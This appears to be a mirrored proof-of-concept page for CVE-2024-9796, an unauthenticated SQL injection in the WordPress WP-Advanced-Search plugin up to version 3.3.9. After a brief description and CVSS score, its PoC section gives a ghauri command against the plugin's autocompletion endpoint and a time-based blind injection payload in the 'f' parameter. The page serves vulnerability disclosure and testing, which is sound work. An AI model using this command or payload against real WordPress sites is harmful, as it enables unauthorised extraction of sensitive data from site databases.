CVE-2024-9796 PoC — WordPress plugin WP-Advanced-Search 安全漏洞

Source

Associated Vulnerability

Description

WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection

Readme

# CVE-2024-9796
WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection

# Description
The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

```
Type: plugin
CVSS Score: 7.5
CVE: CVE-2024-9796
Slug: wp-advanced-search
```

Download Link: [Download wp-advanced-search Version 3.3.9](https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip)

#POC
---

```
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"
```

```
Parameter: f (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853'
```

File Snapshot

 [4.0K]  /data/pocs/abe01c26b874bbf352e61637164376f1e48c9a29
└── [1.2K]  README.md

0 directories, 1 file

Remarks